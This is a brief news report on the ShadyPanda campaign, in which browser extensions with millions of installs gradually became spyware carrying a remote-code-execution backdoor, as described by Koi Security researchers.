Shadypanda Browser Extensions Amass 4.3m Installs In Malicious...

A long-running malware operation known as "ShadyPanda" has amassed over 4.3 million installations of seemingly legitimate Chrome and Edge browser extensions that evolved into malware.

The operation, discovered by Koi Security, unfolded in distinct phases that gradually introduced additional malicious functionality, turning the browser extension from a legitimate tool into spyware.

The ShadyPanda campaign consists of 145 malicious extensions (20 Chrome and 125 Edge) over the years. While Google has removed them from the Web Store, Koi reports that the campaign remains active on the Microsoft Edge Add-ons platform, with one extension listed as having 3 million installs.

It should be noted that it is unclear if the installations of these extensions have been manually inflated to increase their legitimacy.

While the initial submissions of ShadyPanda extensions occurred in 2018, the first signs of malicious activity were observed in 2023, with a set of extensions posing as wallpaper and productivity tools.

According to Koi researchers, these extensions engaged in affiliate fraud by injecting tracking codes from eBay, Booking.com, and Amazon into legitimate links to generate revenue from users' purchases.

In early 2024, an extension called Infinity V+ began performing search hijacking, indicating that the ShadyPanda operators were becoming bolder.

In 2024, five extensions from the set, including three uploaded in 2018 and 2019, which had gained a good reputation in the meantime, were modified to include a "backdoor" delivered via an update that enabled them to perform remote code execution.

"Every infected browser runs a remote code execution framework. Every hour, it checks api.extensionplay[.]com for new instructions, downloads arbitrary JavaScript, and executes it with full browser API access," explains Koi Security about the backdoor's functionality.

"This isn't malware with a fixed function. It's a backdoor."

Source: BleepingComputer